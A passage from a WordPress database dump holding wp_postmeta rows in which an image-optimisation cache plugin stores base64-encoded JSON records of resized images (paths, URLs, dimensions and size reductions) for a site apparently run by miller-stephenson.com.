waGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja180MTgwOTA2NzUtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9zaHV0dGVyc3RvY2tfNDE4MDkwNjc1LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxMTY1LCJ0aW1lIjoxNDgzNTQ4MTY0LCJpZCI6MjU3MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zaHV0dGVyc3RvY2tfNDE4MDkwNjc1LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzQxODA5MDY3NS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja180MTgwOTA2NzUtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjExMjAsInRpbWUiOjE0ODM1NDgxNjgsImlkIjoyNTcwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja180MTgwOTA2NzUtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzQxODA5MDY3NS0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzQxODA5MDY3NS0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjo1ODc4LCJ0aW1lIjoxNDgzNTQ4MTczLCJpZCI6MjU3MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zaHV0dGVyc3RvY2tfNDE4MDkwNjc1LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzQxODA5MDY3NS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja180MTgwOTA2NzUtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjQ0NCwidGltZSI6MTQ4MzU0ODE3NiwiaWQiOjI1NzB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzQxODA5MDY3NS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja180MTgwOTA2NzUtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9zaHV0dGVyc3RvY2tfNDE4MDkwNjc1LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjozOTIsInRpbWUiOjE0ODM1NDgxODIsImlkIjoyNTcwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja180MTgwOTA2NzUtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zaHV0dGVyc3RvY2tfNDE4MDkwNjc1LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzQxODA5MDY3NS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NDI4LCJ0aW1lIjoxNDgzNTQ4MTg1LCJpZCI6MjU3MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zaHV0dGVyc3RvY2tfNDE4MDkwNjc1LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzQxODA5MDY3NS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja180MTgwOTA2NzUtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjg0NCwidGltZSI6MTQ4MzU0ODE5MCwiaWQiOjI1NzB9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (28792, 2553, 'wpfc_optimisation_reduction', '16421'); 
INSERT INTO `wp_postmeta` VALUES (28793, 2553, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQwNTYzMzkzNy5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180MDU2MzM5MzcuanBnIiwid2lkdGgiOjYwMDAsImhlaWdodCI6MzM3NSwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU0ODE5NCwiaWQiOiIyNTUzIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDA1NjMzOTM3LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQwNTYzMzkzNy0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180MDU2MzM5MzctMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjk5MiwidGltZSI6MTQ4MzU0ODE5OCwiaWQiOjI1NTN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQwNTYzMzkzNy04MDB4NDUwLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NDUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180MDU2MzM5MzctODAweDQ1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDA1NjMzOTM3LTgwMHg0NTAuanBnIiwicmVkdWN0aW9uIjoyMzU3LCJ0aW1lIjoxNDgzNTQ4MjAxLCJpZCI6MjU1M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDA1NjMzOTM3LTc2OHg0MzIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo0MzIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQwNTYzMzkzNy03Njh4NDMyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180MDU2MzM5MzctNzY4eDQzMi5qcGciLCJyZWR1Y3Rpb24iOjIwOTksInRpbWUiOjE0ODM1NDgyMDUsImlkIjoyNTUzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180MDU2MzM5MzctMTYwMHg5MDAuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6OTAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180MDU2MzM5MzctMTYwMHg5MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQwNTYzMzkzNy0xNjAweDkwMC5qcGciLCJyZWR1Y3Rpb24iOjczNzUsInRpbWUiOjE0ODM1NDgyMDksImlkIjoyNTUzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180MDU2MzM5MzctMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDA1NjMzOTM3LTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQwNTYzMzkzNy0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NjYzLCJ0aW1lIjoxNDgzNTQ4MjEyLCJpZCI6MjU1M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDA1NjMzOTM3LTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQwNTYzMzkzNy0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180MDU2MzM5MzctMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjQ5NCwidGltZSI6MTQ4MzU0ODIxNiwiaWQiOjI1NTN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQwNTYzMzkzNy0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180MDU2MzM5MzctMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDA1NjMzOTM3LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1NjYsInRpbWUiOjE0ODM1NDgyMTksImlkIjoyNTUzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180MDU2MzM5MzctNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDA1NjMzOTM3LTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQwNTYzMzkzNy01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTg3NSwidGltZSI6MTQ4MzU0ODIyMywiaWQiOjI1NTN9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (28794, 2546, 'wpfc_optimisation_reduction', '8769'); 
INSERT INTO `wp_postmeta` VALUES (28795, 2546, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM1NTAwNDk2OS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNTUwMDQ5NjkuanBnIiwid2lkdGgiOjQ5ODUsImhlaWdodCI6MzMyNCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU0ODIyOCwiaWQiOiIyNTQ2In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzU1MDA0OTY5LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM1NTAwNDk2OS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNTUwMDQ5NjktMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjYzNiwidGltZSI6MTQ4MzU0ODIzMSwiaWQiOjI1NDZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM1NTAwNDk2OS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNTUwMDQ5NjktODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzU1MDA0OTY5LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxMTA1LCJ0aW1lIjoxNDgzNTQ4MjM1LCJpZCI6MjU0Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzU1MDA0OTY5LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM1NTAwNDk2OS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNTUwMDQ5NjktNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjExMzIsInRpbWUiOjE0ODM1NDgyMzksImlkIjoyNTQ2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNTUwMDQ5NjktMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM1NTAwNDk2OS0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM1NTAwNDk2OS0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjozNDQyLCJ0aW1lIjoxNDgzNTQ4MjQ0LCJpZCI6MjU0Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzU1MDA0OTY5LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM1NTAwNDk2OS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNTUwMDQ5NjktMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjYxNSwidGltZSI6MTQ4MzU0ODI0NywiaWQiOjI1NDZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM1NTAwNDk2OS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNTUwMDQ5NjktMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzU1MDA0OTY5LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo1MTEsInRpbWUiOjE0ODM1NDgyNTIsImlkIjoyNTQ2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNTUwMDQ5NjktMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzU1MDA0OTY5LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM1NTAwNDk2OS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NTI2LCJ0aW1lIjoxNDgzNTQ4MjU1LCJpZCI6MjU0Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzU1MDA0OTY5LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM1NTAwNDk2OS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNTUwMDQ5NjktNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjgwMiwidGltZSI6MTQ4MzU0ODI1OSwiaWQiOjI1NDZ9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (28796, 2505, 'wpfc_optimisation_reduction', '10104'); 
INSERT INTO `wp_postmeta` VALUES (28797, 2505, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzEzMDE5NjI5MS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18xMzAxOTYyOTEuanBnIiwid2lkdGgiOjU2MTYsImhlaWdodCI6Mzc0NCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU0ODI2MywiaWQiOiIyNTA1In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMTMwMTk2MjkxLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0